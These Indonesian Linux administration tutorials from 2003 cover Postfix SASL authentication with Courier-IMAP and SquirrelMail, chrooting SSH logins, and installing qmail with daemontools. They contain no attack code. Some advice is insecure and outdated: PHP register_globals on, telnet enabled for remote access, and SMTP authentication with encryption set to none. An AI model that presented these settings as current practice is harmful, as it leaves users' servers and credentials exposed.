[root@wolfgang src]# vtdeluserimap asfik@cs.perbanas.edu

Jika secara manual, yang pertama-tama anda lakukan adalah memasukkan PATH dari /usr/lib/courier-imap/sbin kedalam environment PATH anda :

[root@wolfgang src]# PATH=$PATH:/usr/lib/courier-imap/sbin
[root@wolfgang src]# export PATH

Buat entry misalnya untuk username asfik@cs.perbanas.edu (sesuaikan 521 /522 dengan UID/GID user virtual) :

[root@wolfgang root]# userdb -f /etc/userdb/cs.perbanas.edu asfik@cs.perbanas.edu set home=/home/virtual/cs.perbanas.edu/asfik mail=/home/virtual/cs.perbanas.edu/asfik uid=521 gid=522

Kemudian set password IMAP nya :

[root@wolfgang root]# userdbpw -md5 | userdb -f /etc/userdb/cs.perbanas.edu asfik@cs.perbanas.edu set imappw

Langkah terakhir, buat databasenya :

[root@wolfgang root]# makeuserdb

Selanjutnya untuk mengetest IMAP, kita install squirrelmail :)
4. Instal Squirrelmail

Menurut file INSTALL dari distribusi Squirrelmail, software ini membutuhkan php versi 4 yang minimal dikompilasi dengan opsi --enable-track-vars --enable-force-cgi-redirect --with-gettext serta membutuhkan register_global=On dan file_uploads = On di php.ini (jika php anda menggunakan default RPM Redhat file php.ini terletak didirektori /etc).

Download dan ekstrak paket squirrelmail (yang paling baru) :

[root@wolfgang src]# wget http://umn.dl.sf.net/sourceforge/squirrelmail/squirrelmail-1.2.11.tar.gz
[root@wolfgang src]# tar -xzvf squirrelmail-1.2.11.tar.gz

Diasumsikan diserver anda telah terinstall apache, maka tentukan letak direktori squirrelmail pada direktif DocumentRoot di httpd.confanda, misalnya disini saya letakkan didirektori /usr/local/httpd/htdocs/mail karena document root dari apachenya adalah /usr/local/httpd/htdocs:

[root@wolfgang src]# mv squirrelmail-1.2.11 /usr/local/httpd/htdocs/mail

Tentukan user dan group yang menjalankan proses apache :

[root@wolfgang src]# egrep '^(User|Group)' /usr/local/httpd/conf/httpd.conf
User www
Group www

Dari perintah diatas kita peroleh user www dan group www, kemudian ganti kepemilikan direktori /usr/local/httpd/htdocs/mail/data menjadi user www dan group www :

[root@wolfgang src]# chown -R www.www /usr/local/httpd/htdocs/mail/data/

Salin file konfigurasi standar ke file konfigurasi squirrelmail :

[root@wolfgang src]# cp /usr/local/httpd/htdocs/mail/config/config_default.php /usr/local/httpd/htdocs/mail/config/config.php

Edit file tersebut dari $imap_server_type = 'cyrus'; menjadi$imap_server_type = 'courier'; :

[root@wolfgang src]# vi /usr/local/httpd/htdocs/mail/config/config.php

Atau jika anda mengalami kesulitan anda bisa menggunakan script perl yang disertakan oleh squirrelmail, pada direktori config :

[root@wolfgang src]# cd /usr/local/httpd/htdocs/mail/config
[root@wolfgang config]# ./conf.pl

Kemudian silakan dicoba dengan browser anda, masukkan user yang telah anda buat misalnya asfik@cs.perbanas.edu

Enjoy :)
5. Lain-lain (Opsional)
5.1 SASL

Jika anda berencana menggunakan autentikasi ketika menggunakan smtp di postfix anda bisa menggunakan cyrus-sasl . SASL (Simple Authentication and Security Layer) adalah suatu metode untuk penambahan dukungan autentikasi terhadap suatu protokol, atau gampangnya jika hal ini berkaitan dengan postfix maka SASL bisa diartikan sebagai proses autentikasi suatu user terhadap smtp di postfix dengan password yang ter-enkrispi. Jadi setiap kali user tersebut mengirim email, maka akan selalu diminta memasukkan password terlebih dahulu.

Untuk menggunakan fitur ini anda harus mengkompilasi (ulang) postfix anda agar support sasl, pertama-tama jika ada cyrus-saslbawaan dari distro kita hapus dulu :

[root@wolfgang src]# for a in $(rpm -qa | grep sasl); do rpm -e --nodeps $a; done

Download cyrus-sasl (yang paling baru), ekstrak kemudian kompile, dan install :

[root@wolfgang src]# wget ftp://ftp.andrew.cmu.edu/pub/cyrus-mail/cyrus-sasl-1.5.28.tar.gz
[root@wolfgang src]# tar -xzvf cyrus-sasl-1.5.28.tar.gz
[root@wolfgang src]# cd cyrus-sasl-1.5.28
[root@wolfgang cyrus-sasl-1.5.28]# ./configure --enable-krb4=no
[root@wolfgang cyrus-sasl-1.5.28]# make
[root@wolfgang cyrus-sasl-1.5.28]# make install

Buat symlink direktori /usr/local/lib/ssl ke direktori /usr/lib/sasl:

[root@wolfgang cyrus-sasl-1.5.28]# ln -s /usr/local/lib/sasl /usr/lib/sasl

Buat file /usr/local/lib/sasl/smtpd.conf isinya :

pwcheck_method: sasldb

Jika perlu pada file /etc/ld.so.conf anda tambahkan /usr/local/lib kemudian lakukan ldconfig :

[root@wolfgang cyrus-sasl-1.5.28]# ldconfig

Stop daemon postfix anda (postfix stop), untuk kemudian dikompilasi ulang supaya postfixnya mendukung SASL

[root@wolfgang src]# tar -xzvf postfix-2.0.6.tar.gz
[root@wolfgang src]# cd postfix-2.0.6
[root@wolfgang postfix-2.0.6]# patch -p1 < ../postfix-2.0.6.patch
[root@wolfgang postfix-2.0.6]# make makefiles CCARGS="-DUSE_SASL_AUTH -I/usr/local/include" AUXLIBS="-L/usr/local/lib -lsasl"
[root@wolfgang postfix-2.0.6]# make
[root@wolfgang postfix-2.0.6]# make install

Edit file /etc/postfix/main.cf anda, tambahkan baris berikut ini :

smtpd_sasl_auth_enable = yes
smtpd_sasl_local_domain = $myhostname
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, check_relay_domains
smtpd_sasl_security_options = noanonymous, noplaintext

Start daemon postfix :

[root@wolfgang postfix-2.0.6]# postfix start

Test apakah postfix anda sudah mendukung autentikasi (AUTH) :

[root@wolfgang postfix-2.0.6]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 wolfgang.cs.perbanas.edu ESMTP Postfix
EHLO wolfgang.cs.perbanas.edu
250-wolfgang.cs.perbanas.edu
250-PIPELINING
250-SIZE 10240000
250-VRFY 250-ETRN
250-AUTH ANONYMOUS DIGEST-MD5 CRAM-MD5
250-XVERP
250 8BITMIME
quit
221 Bye Connection closed by foreign host.

Kemudian kita buat satu buah username untuk percobaan, misalnya :

[root@wolfgang src]# saslpasswd -a smtpd -c asfik@cs.perbanas.edu

Jika anda menemui saslpasswd: generic failure pada waktu pertama kali bikin database ini adalah wajar, karena file /etc/sasldb tidak ada, untuk mengatasinya lakukan sekali lagi :

[root@wolfgang src]# saslpasswd -a smtpd -c asfik@cs.perbanas.edu

Periksa dengan perintah sasldblistusers untuk memeriksa apakah sudah ok :

[root@wolfgang src]# sasldblistusers
user: asfik@cs.perbanas.edu realm: wolfgang.cs.perbanas.edu mech: DIGEST-MD5
user: asfik@cs.perbanas.edu realm: wolfgang.cs.perbanas.edu mech: CRAM-MD5
user: asfik@cs.perbanas.edu realm: wolfgang.cs.perbanas.edu mech: PLAIN

Ganti kepemilikan file /etc/sasldb dengan groupnya user postfix :

[root@wolfgang src]# chgrp postfix /etc/sasldb

Kemudian, testing dengan mengirim email dengan MUA kesayangan anda, disini saya menggunakan KMail 1.4.1. Dari menu Setting -> Configure KMail -> Network -> Sending, kemudian anda bisa memodifikasi atau menambah baru, misalnya klik Add -> SMTP. Kemudian pada tab General -> Name, Host, dan Port isikan sesuai dengan konfigurasi anda. Kemudian beri tanda cek pada "Server requires authentication". Isikan Login dan Password yang sesuai (misalnya asfik@cs.perbanas.edu dan password yang sesuai dengan yang dimasukkan), jika ingin menyimpannya berikan tanda cek pada "Store SMTP password in configuration file". Kemudian yang terakhir dan paling penting pada tab Security , pilih None pada Encryption dan pilih DIGEST-MD5 pada Authentication Method, jika suskses, pada file /var/log/maillog anda akan terpadapat seperti ini :

Apr 8 11:21:34 wolfgang postfix/smtpd[10037]: 5DBEABB3A:
client=alkhwarizmi.cs.perbanas.edu[10.126.10.13],sasl_method=DIGEST-MD5,
sasl_username=asfik@cs.perbanas.edu

Untuk konfigurasi dengan menggunakan MUA mutt, Ximian Evolutions, ataupun Netscape anda bisa melihat tulisan saya tentang "Menggunakan SMTP Auth (qmail-smtpd-auth) di vpopmail dan vmailmgr" di http://people.cakraweb.com/~asfik/writings/qmail-smtpd-auth.html, untuk MUA yang lain silakan baca dokumentasi dari MUA anda tersebut, semoga berhasil.
6. ChangeLog

10 April 2003

Penambahan SASL

04 April 2003

Minor update, penambahan courier dan squirrelmail

25 Maret 2003

Penulisan tutorial ini dimulai - minus courier-imap dan squirrelmail
7. Referensi

http://www.postfix.org/
http://www.oav.net/~kiwi/postfix/
http://www.ex-parrot.com/~chris/tpop3d/
http://www.courier-mta.org/
http://asg.web.cmu.edu/sasl/
http://www.mandrakesecure.net/en/docs/postfix-sasl.php
File INSTALL, README dan direktori docs pada setiap distribusi paket

Chroot login di Linux dengan menggunakan sshd

2005-03-07T04:32:00.000-08:00

writer : Asfihani (asfik@cakraweb.com)
26 Februari 2003

Jika Anda merasa apa yang saya tulis berikut ini berguna dan ingin membuat saya gembira, Anda bisa mengirimkan satu (atau lebih) CD dari daftar wishlist saya. Tentu saja, usaha Anda akan sangat saya hargai :-).
Pendahuluan

Tujuan dari chroot terhadap suatu login(account/user) adalah untuk "memenjarakan" user tersebut ke home direktorinya sendiri sehingga user yang bersangkutan tidak bisa "naik" ke direktori yang lebih tinggi diatasnya. Hal ini mungkin bisa meminimalisir usaha pembajakan terhadap suatu account yang lain (misalnya root) ataupun pencurian data user maupun data penting lainnya pada suatu sistem operasi linux.

Karena sshd yang mendukung chroot adalah sshd dari ssh.com, maka langkah yang pertama adalah menginstall sshd tersebut dan menguninstall openssh (sshd yang digunakan berlisensi free for non commercial use), jika anda sudah menggunakan sshd dari ssh.com anda bisa melewati langkah berikut ini :

[root@kurowo asfik]# wget ftp://ftp.ssh.com/pub/ssh/ssh-3.2.3.tar.gz
[root@kurowo asfik]# tar -xzvf ssh-3.2.3.tar.gz
[root@kurowo asfik]# cd ssh-3.2.3
[root@kurowo ssh-3.2.3]# ./configure
[root@kurowo ssh-3.2.3]# make
[root@kurowo ssh-3.2.3]# make install

Perhatian, langkah berikut ini sangatlah penting, silakan berhati-hati dalam mengerjakannya, terutama jika anda bekerja diserver secara remote. Aktifkan terlebih dahulu protokol telnet, hal ini untuk mencegah jika tiba-tiba kita tidak bisa terhubung ke server menggunakan ssh. Pada distro Redhat anda bisa menyunting file /etc/xinetd.d/telnetdan ubah pada bagian disable = yes menjadi disable = no. Kemudian restart xinetd :

[root@kurowo asfik]# service xinetd restart

Setelah ok, silakan masuk ke server melalui protokol telnet, langkah selanjutnya adalah langsung menghentikan sshd yang masih berjalan :

[root@kurowo asfik]# service sshd stop

Pastikan semua user telah logout (atau kita logoutkan secara pasti :D ):

[root@kurowo asfik]# killall -9 sshd

Hapus openssh :

[root@kurowo asfik]# for a in $(rpm -qa | grep openssh); do rpm -e --nodeps $a; done

Semenjak root merupakan account yang keramat, maka kita putuskan untuk menolak ssh dengan login root dengan menyunting file /etc/ssh2/sshd2_config pada bagian PermitRootLogin menjadi :

PermitRootLogin no

Jalankan sshd yang terbaru dari ssh.com :

[root@kurowo asfik]# /usr/local/sbin/sshd

Untuk memastikan sshd yang baru secara otomatis dijalankan setiap server di reboot :

[root@kurowo asfik]# echo "/usr/local/sbin/sshd" >> /etc/rc.local

Silakan dicoba untuk melakukan ssh ke server tersebut, jika sukses, jangan lupa langsung mematikan kembali daemon telnet dengan menyunting kembali /etc/xinetd.d/telnet dan mengubah bagian disable = no menjadi disable = yes, dan karena kita tidak memerlukan xinetd :

[root@kurowo asfik]# service xinetd stop

Buat user baru yang akan dichroot (misalnya user niken ) sekalian kita set passwordnya :

[root@kurowo asfik]# useradd niken
[root@kurowo asfik]# passwd niken
Changing password for user niken
New password:
Retype new password:
passwd: all authentication tokens updated successfully

Buat direktori etc,bin,lib didirektori /home/niken :

[root@kurowo asfik]# mkdir /home/niken/{etc,bin,lib}

Buat entry untuk user niken di file /home/niken/etc/passwd dan /home/niken/etc/group :

[root@kurowo asfik]# grep ^niken /etc/passwd > /home/niken/etc/passwd
[root@kurowo asfik]# grep ^niken /etc/group > /home/niken/etc/group

Install bash dengan menyalin file /bin/bash ke /home/niken/bin:

[root@kurowo asfik]# cp /bin/bash /home/niken/bin

Salin file library yang digunakan oleh bash (anda bisa memeriksanya dengan perintah ldd) :

[root@kurowo asfik]# ldd /bin/bash
libtermcap.so.2 => /lib/libtermcap.so.2 (0x4001d000)
libdl.so.2 => /lib/libdl.so.2 (0x40021000)
libc.so.6 => /lib/i686/libc.so.6 (0x40025000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[root@kurowo asfik]# cp /lib/libtermcap.so.2 /home/niken/lib
[root@kurowo asfik]# cp /lib/libdl.so.2 /home/niken/lib
[root@kurowo asfik]# cp /lib/i686/libc.so.6 /home/niken/lib
[root@kurowo asfik]# cp /lib/ld-linux.so.2 /home/niken/lib

Atau bisa juga dengan menggunakan perintah ini :

[root@kurowo asfik]# for a in $(ldd /bin/bash | awk '{print $3}'); do cp $a /home/niken/lib/; done

Untuk Redhat 7.x, salin pula file /lib/libnss_files.so.2, /lib/libnsl.so.1dan /lib/libnss_compat.so.2 :

[root@kurowo asfik]# cp /lib/libnss_files.so.2 /home/niken/lib
[root@kurowo asfik]# cp /lib/libnsl.so.1 /home/niken/lib
[root@kurowo asfik]# cp /lib/libnss_compat.so.2 /home/niken/lib

Jika diperlukan juga, install file-utils (ln,ls,rm,mv,cp,du,mkdir):

[root@kurowo asfik]# cp /bin/{ln,ls,rm,mv,cp,mkdir} /home/niken/bin
[root@kurowo asfik]# cp /usr/bin/du /home/niken/bin

Periksa kembali library yang akan digunakan oleh file-file tersebut dengan menggunakan perintah ldd (misalnya: ldd /bin/ls dan seterusnya), kemudian salin ke direktori lib pada home direktori user yang bersangkutan. Ganti kepemilikan /home/niken ke user niken :

[root@kurowo asfik]# chown -R niken.niken /home/niken

Jika anda menginginkan agar user yang bersangkutan tidak bisa menghapus file/direktori yang digunakan dalam chroot, anda bisa menggunakan perintah chattr :

[root@kurowo asfik]# chattr -R +i /home/niken/{bin,etc,lib}

Langkah terakhir adalah menambahkan entry niken pada file /etc/ssh2/sshd2_config bagian ChRootUsers menjadi sebagai berikut :

ChRootUsers anonymous,ftp,guest,niken

Restart daemon ssh :

[root@kurowo asfik]# killall -HUP sshd

Jika sukses, anda bisa mencoba ssh ke localhost dengan menggunakan login niken :

[root@kurowo asfik]# ssh niken@localhost
niken's password:
Authentication successful.
Last login: Wed Feb 26 2003 12:51:42 +0700 from localhost
No mail.
bash-2.05$ ls -la
total 40
drwx------ 5 niken niken 4096 Feb 26 05:48 .
drwx------ 5 niken niken 4096 Feb 26 05:48 ..
-rw------- 1 niken niken 57 Feb 26 05:52 .bash_history
-rw-r--r-- 1 niken niken 24 Feb 26 05:21 .bash_logout
-rw-r--r-- 1 niken niken 191 Feb 26 05:21 .bash_profile
-rw-r--r-- 1 niken niken 124 Feb 26 05:21 .bashrc
-rw-r--r-- 1 niken niken 3511 Feb 26 05:21 .screenrc
drwxr-xr-x 2 niken niken 4096 Feb 26 05:47 bin
drwxr-xr-x 2 niken niken 4096 Feb 26 05:49 etc
drwxr-xr-x 2 niken niken 4096 Feb 26 05:53 lib

FIN

http://efnet.linux.or.id/docs/ <--- link this sites

Tutorial instalasi Qmail, Courier Imap, dan Squirrelmail

2005-03-07T04:30:00.000-08:00

writer : Asfihani (asfik@cakraweb.com)

Dokumen (tutorial) ini ditujukan untuk membantu membuat sebuah mailserver untuk satu domain, serta aplikasi pendukung pembacaan email melalui web (webmail) dengan menggunakan squirrelmail secara step-by-step dalam Bahasa Indonesia. Anda juga bisa melihat tulisan Jamaludin Ahmad tentang instalasi qmail di http://www.jamalinux.com/?open=writing=qmail. Sistem Operasi yang digunakan adalah Redhat Linux 7.3. Semua paket menggunakan format source tarball. Dokumen ini diketik menggunakan lyx dan dapat anda dapatkan dalam format PDF di http://people.cakraweb.com/~asfik/writings/qmail.pdf. Tidak ada copyright apapun dalam dukumen ini, anda bebas menyalin, mencetak, maupun memodifikasi (dengan menyertakan nama penulis asli). Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. Terima Kasih.

"Untuk ibu saya tercinta, guru pertama saya "

Jika Anda merasa apa yang saya tulis berikut ini berguna dan ingin membuat saya gembira, Anda bisa mengirimkan satu (atau lebih) CD dari daftar wishlist saya. Tentu saja, usaha Anda akan sangat saya hargai :-).
1. Instalasi Qmail

Sebelum memulai, silakan anda uninstall software mailserver (MTA) lain yang berada dalam server anda misalnya sendmail, dan silakan anda membuat sebuah direktori temporari untuk memudahkan penyimpanan source yang akan didownload, anda boleh membuat direktori dengan nama sembarang, disini saya membuat direktori dengan nama src :

[root@wedus asfik]# service sendmail stop
[root@wedus asfik]# for a in `rpm -qa | grep sendmail`; do rpm -e --nodeps $a; done
[root@wedus asfik]# mkdir src
[root@wedus asfik]# cd src

Download qmail dan paket pendukung yang lain (daemontools, ucspi-tcp) :

[root@wedus src]# wget http://cr.yp.to/software/qmail-1.03.tar.gz
[root@wedus src]# wget http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
[root@wedus src]# wget http://cr.yp.to/daemontools/daemontools-0.76.tar.gz

Perhatian : Jika anda menggunakan glibc versi 2.3 keatas (misalnya Redhat 9), silakan download patch untuk qmail dari miror lokal kesayangan anda misalnya dari ISP CBN :

[root@wedus src]# wget http://qmail.cbn.net.id/moni.csi.hu/pub/glibc-2.3.1/qmail-1.03.errno.patch
[root@wedus src]# wget http://qmail.cbn.net.id/moni.csi.hu/pub/glibc-2.3.1/ucspi-tcp-0.88.errno.patch
[root@wedus src]# wget http://qmail.cbn.net.id/moni.csi.hu/pub/glibc-2.3.1/daemontools-0.76.errno.patch

Download qmailqueue-patch, yang berguna sebagai add-on qmail agar bisa menjalankan external program, misalnya jika dikemudian hari anda menginginkan software anti-virus, serta quotas-patch, yang berguna untuk membounce email jika suatu user sistem (user email) sudah melebihi quota sistem :

[root@wedus src]# wget http://www.qmail.org/qmailqueue-patch
[root@wedus src]# wget http://www.qmail.org/qmail-1.03-quotas-1.1.patch

Ekstrak semua source tersebut :

[root@wedus src]# tar -xzvf qmail-1.03.tar.gz
[root@wedus src]# tar -xzvf daemontools-0.76.tar.gz
[root@wedus src]# tar -xzvf ucspi-tcp-0.88.tar.gz

Buat direktori untuk qmail dan pembuatan account user yang akan menjalankan dan mengurusi qmail :

[root@wedus src]# mkdir /var/qmail
[root@wedus src]# groupadd nofiles
[root@wedus src]# useradd -g nofiles -d /var/qmail/alias alias
[root@wedus src]# useradd -g nofiles -d /var/qmail qmaild
[root@wedus src]# useradd -g nofiles -d /var/qmail qmaill
[root@wedus src]# useradd -g nofiles -d /var/qmail qmailp
[root@wedus src]# groupadd qmail
[root@wedus src]# useradd -g qmail -d /var/qmail qmailq
[root@wedus src]# useradd -g qmail -d /var/qmail qmailr
[root@wedus src]# useradd -g qmail -d /var/qmail qmails

Kompilasi qmail, daemontools, tcpserver dan mengepatch qmail dengan beberapa patch tersebut diatas :

[root@wedus src]# cd qmail-1.03

Perhatian : Jika anda menggunakan glibc versi 2.3 keatas (misalnya Redhat 9), patch qmail anda :

[root@wedus qmail-1.03]# patch -p1 < ../qmail-1.03.errno.patch

Jika diperlukan patch dengan queue patch dan quota patch :

[root@wedus qmail-1.03]# patch -p1 < ../qmailqueue-patch
[root@wedus qmail-1.03]# patch -p1 < ../qmail-1.03-quotas-1.1.patch

Kompile dan install qmail :

[root@wedus qmail-1.03]# make setup check

Membuat file konfigurasi qmail, disini silakan anda ganti gibas.wedus.comdengan hostname anda yang FQDN (bisa diresolve), misalnya serverku.domain.com.Ingat, hostname tidak harus sama dengan nama server host tempat anda menginstall qmail tersebut :

[root@wedus qmail-1.03]# ./config-fast gibas.wedus.com

Pada langkah yang penting ini kita akan menentukan nama domain yang akan diurusi/dihandle oleh qmail diserver ini, misalnya wedus.com. Masukkan nama domain tersebut ke file rcpthosts dan locals sehingga nantinya akan dianggap sebagai domain lokal dan bukan virtual oleh qmail, misalnya :

[root@wedus qmail-1.03]# echo wedus.com >> /var/qmail/control/locals
[root@wedus qmail-1.03]# echo wedus.com >> /var/qmail/control/rcpthosts

Install ucspi-tcp dan daemontools :

[root@wedus qmail-1.03]# cd ../ucspi-tcp-0.88

Perhatian : Jika anda menggunakan glibc versi 2.3 keatas (misalnya Redhat 9), patch ucspi-tcp anda :

[root@wedus ucspi-tcp-0.88]# patch -p1 < ../ucspi-tcp-0.88.errno.patch

Kompile dan install ucspi-tcp :

[root@wedus ucspi-tcp-0.88]# make setup check
[root@wedus ucspi-tcp-0.88]# cd ../admin/daemontools-0.76/

Perhatian : Jika anda menggunakan glibc versi 2.3 keatas (misalnya Redhat 9), patch daemontools anda :

[root@wedus daemontools-0.76]# patch -p1 < ../../daemontools-0.76.errno.patch

Kompil dan install daemontools :

[root@wedus daemontools-0.76]# ./package/install

Jika daemontools sukses terinstal, anda bisa mengecek dengan menggunakan perintah ps, misalnya :

[root@wedus daemontools-0.76]# ps ax | grep read
6529 ? S 0:00 readproctitle service errors: .......................

Saya kurang suka dengan struktur penempatan atau symlink file dan direktori pada daemontools dan (menurut saya lho) cenderung amburadul, jadi direktori /command saya hapus kemudian diganti dengan direktori command dari source daemontools :

[root@wedus daemontools-0.76]# rm -rf /command/
[root@wedus daemontools-0.76]# mv command/ /

Buat file startup untuk menjalankan qmail-send, dan mengganti defaultdelivery dari format Mailbox ke format Maildir :

[root@wedus asfik]# cp /var/qmail/boot/home /var/qmail/rc
[root@wedus asfik]# perl -pi -e "s/Mailbox splogger qmail/Maildir\//g" /var/qmail/rc

Jika perintah perl tersebut diatas ada kesalahan atau Linux ada tidak terinstall program perl (sulit dipercaya?), silakan secara manual anda mengganti pada file /var/qmail/rc dari baris ini :

qmail-start ./Mailbox splogger qmail

menjadi :

qmail-start ./Maildir/

Buat direktori untuk menyimpan file-file supervise :

[root@wedus asfik]# mkdir -p /var/qmail/supervise/qmail-send/log
[root@wedus asfik]# mkdir -p /var/qmail/supervise/qmail-smtpd/log

Buat file script supervise untuk menjalankan qmail-send :

[root@wedus asfik]# vi /var/qmail/supervise/qmail-send/run

Isinya :

#!/bin/sh
exec /var/qmail/rc

Buat file script supervise untuk menjalankan log qmail-send :

[root@wedus asfik]# vi /var/qmail/supervise/qmail-send/log/run

Isinnya :

#!/bin/sh
exec /usr/local/bin/setuidgid qmaill /usr/local/bin/multilog t s1048576 /var/log/qmail

Buat file script supervise untuk menjalankan qmail-smtpd :

[root@wedus asfik]# vi /var/qmail/supervise/qmail-smtpd/run

Isinya :

#!/bin/sh
PATH=$PATH:/usr/local/bin:/var/qmail/bin
export PATH
QMAILDUID=`id -u qmaild`
NOFILESGID=`id -g qmaild`
MAXSMTPD=30
exec /usr/local/bin/softlimit -m 5000000 tcpserver -H -R -v -x /etc/tcp.smtp.cdb -c "$MAXSMTPD" -u "$QMAILDUID" -g "$NOFILESGID" 0 25 qmail-smtpd 2>&1

Variabel MAXSMTPD bisa anda sesuaikan dengan kondisi kebutuhan dan beban mailserver anda. Jika anda menginginkan penolakan terhadap email yang datang dari mailserver yang open relay yang biasanya merupakan SPAM, anda bisa menggunakan rblsmtpd menjadi :

tcpserver -H -R -v -x /etc/tcp.smtp.cdb -c "$MAXSMTPD" -u "$QMAILDUID" -g "$NOFILESGID" 0 25 rblsmtpd -r relays.ordb.org rblsmtpd -b qmail-smtpd 2>&1

Jika anda menggunakan rblsmtpd, anda nanti bisa melihat lognya di /var/log/qmail/smtpd/current :

[root@wedus asfik]# tail -f /var/log/qmail/smtpd/current
@400000003dbca93728ec47bc tcpserver: pid 11461 from 128.154.20.228
@400000003dbca93804e39064 rblsmtpd: 128.154.20.228 pid 11461: 451 This mail was handled by an open relay - please visit

Buat file script supervise untuk menjalankan log qmail-smtpd :

[root@wedus asfik]# vi /var/qmail/supervise/qmail-smtpd/log/run

Isinya :

#!/bin/sh
exec /usr/local/bin/setuidgid qmaill /usr/local/bin/multilog t s1048576 /var/log/qmail/smtpd

Ubah menjadi file-file yang bisa dieksekusi :

[root@wedus asfik]# chmod 755 /var/qmail/supervise/qmail-send/run
[root@wedus asfik]# chmod 755 /var/qmail/supervise/qmail-send/log/run
[root@wedus asfik]# chmod 755 /var/qmail/supervise/qmail-smtpd/run
[root@wedus asfik]# chmod 755 /var/qmail/supervise/qmail-smtpd/log/run

Buat direktori untuk log qmail-send dan qmail-smtpd :

[root@wedus asfik]# mkdir -p /var/log/qmail/smtpd
[root@wedus asfik]# chown qmaill /var/log/qmail /var/log/qmail/smtpd

Mengijinkan localhost untuk menggunakan smtp :

[root@wedus src]# echo '127.0.0.1:allow,RELAYCLIENT=""' > /etc/tcp.smtp

Mengatur IP/Network mana saja yang bisa menggunakan smtp server anda, jika misalnya anda menginginkan komputer di jaringan intranet anda dengan IP 10.126.10.11 bisa menggunakan smtp anda, maka :

[root@wedus src]# echo '10.126.10.11:allow,RELAYCLIENT=""' >> /etc/tcp.smtp

Atau jika anda mengijinkan seluruh network anda, misalnya 10.126.10.0/24 maka :

[root@wedus src]# echo '10.126.10.:allow,RELAYCLIENT=""' >> /etc/tcp.smtp

Jangan lupa, setiap selesai penambahan untuk selalu membuat database baru dengan :

[root@wedus src]# tcprules /etc/tcp.smtp.cdb /etc/tcp.smtp.tmp < /etc/tcp.smtp

Akhirnya kita masukkan script yang kita buat kedalam servis supervise :

[root@wedus asfik]# ln -s /var/qmail/supervise/qmail-send /var/qmail/supervise/qmail-smtpd /service

Untuk mengecek apakah supervise sudah menjalankan tugasnya dengan benar bisa digunakan perintah ps, misalnya :

[root@wedus asfik]# ps ax | grep qmail
6636 ? S 0:00 supervise qmail-send
6638 ? S 0:00 supervise qmail-smtpd
6640 ? S 0:00 qmail-send
6641 ? S 0:00 /usr/local/bin/multilog t s1048576 /var/log/qmail
6643 ? S 0:00 /usr/local/bin/multilog t s1048576 /var/log/qmail/smt
6644 ? S 0:00 qmail-lspawn ./Maildir/
6646 ? S 0:00 qmail-rspawn
6647 ? S 0:00 qmail-clean

Untuk sekedar memastikan, anda juga bisa telnet ke localhost port 25 :

[root@wedus src]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 gibas.wedus.com ESMTP

Jika sampai langkah ini, anda belum sukses atau menemui error, coba periksa sekali lagi apakah penulisan script anda sudah betul dan tidak kurang, atau apakah ada langkah/perintah yang anda lewatkan. Anda juga bisa melihat kemungkinan pesan kesalahan/error pada file log /var/log/qmail/current atau /var/log/qmail/smtpd/current atau bisa juga pada proses readproctile, misalnya, dalam kondisi normal:

[root@wedus src]# ps ax | grep read
673 ? S 0:00 readproctitle service errors: .......................

Jika ada sesuatu error/kesalahan pada servise supervise, misalnya jika sebuah command `id` tidak diketemukan karena kesalahan environment $PATH:

[root@wedus src]# ps ax | grep read
673 ? S 0:00 readproctitle service errors: .......?\id...?\command..\?not...found

PENTING. Untuk menerima email bounce ke postmaster silakan anda buat minimal tiga buah email sebagai berikut :

[root@wedus src]# cd ~alias/
[root@wedus alias]# echo paijo@wedus.com > .qmail-root
[root@wedus alias]# echo paijo@wedus.com > .qmail-postmaster
[root@wedus alias]# echo paijo@wedus.com > .qmail-mailer-daemon

Ganti paijo@wedus.com dengan email yang bertanggung jawab terhadap server email tersebut (anda?)

Donwload paket checkpassword, yang akan digunakan sebagai module authentikasi menggunakan protokol pop3 :

[root@wedus src]# wget http://cr.yp.to/checkpwd/checkpassword-0.90.tar.gz
[root@wedus src]# tar -xzvf checkpassword-0.90.tar.gz

Perhatian : Jika anda menggunakan glibc versi 2.3 keatas (misalnya Redhat 9), silakan download patch checkpassword :

[root@wedus src]# wget http://qmail.cbn.net.id/moni.csi.hu/pub/glibc-2.3.1/checkpassword-0.90.errno.patch

Pindah ke direktori source checkpassword :

[root@wedus src]# cd checkpassword-0.90

Perhatian : Jika anda menggunakan glibc versi 2.3 keatas (misalnya Redhat 9), silakan patch checkpassword anda :

[root@wedus checkpassword-0.90]# patch -p1 < ../checkpassword-0.90.errno.patch

Kompile dan install checkpassword :

[root@wedus checkpassword-0.90]# make setup check

Buat direktori dan file script supervise untuk menjalankan qmail-pop3d (pop server) :

[root@wedus asfik]# mkdir -p /var/qmail/supervise/qmail-pop3d
[root@wedus asfik]# vi /var/qmail/supervise/qmail-pop3d/run

Isinya :

#!/bin/sh
PATH=$PATH:/usr/local/bin:/var/qmail/bin
export PATH
MAXPOP3D=30
exec /usr/local/bin/softlimit -m 5000000 \
tcpserver -H -v -c "$MAXPOP3D" 0 110 qmail-popup gibas.wedus.com checkpassword qmail-pop3d Maildir/ 2>&1

Silakan anda sesuaikan variabel MAXPOP3D dan hostname gibas.wedus.comdengan konfigurasi yang sesuai dengan kondisi mail server anda.

Buat file script supervise untuk menjalankan log qmail-pop3d :

[root@wedus asfik]# mkdir -p /var/qmail/supervise/qmail-pop3d/log
[root@wedus asfik]# vi /var/qmail/supervise/qmail-pop3d/log/run

Isinya :

#!/bin/sh
exec /usr/local/bin/setuidgid qmaill /usr/local/bin/multilog t s1048576 /var/log/qmail/pop3d

Buat direktori log qmail-pop3d serta mengeset file script tersebut menjadi executable :

[root@wedus asfik]# mkdir /var/log/qmail/pop3d
[root@wedus asfik]# chown qmaill /var/log/qmail/pop3d
[root@wedus asfik]# chmod 755 /var/qmail/supervise/qmail-pop3d/run
[root@wedus asfik]# chmod 755 /var/qmail/supervise/qmail-pop3d/log/run

Akhirnya kita masukkan script supervise qmail-pop3d kedalam /service :

[root@wedus asfik]# ln -s /var/qmail/supervise/qmail-pop3d /service

Untuk memeriksa apakah servise pop3 server sudah bekerja :

[root@wedus asfik]# ps ax | grep tcpserver
1057 ? S 0:00 tcpserver -H -R -v -x /etc/tcp.smtp.cdb -c 30 -u 503
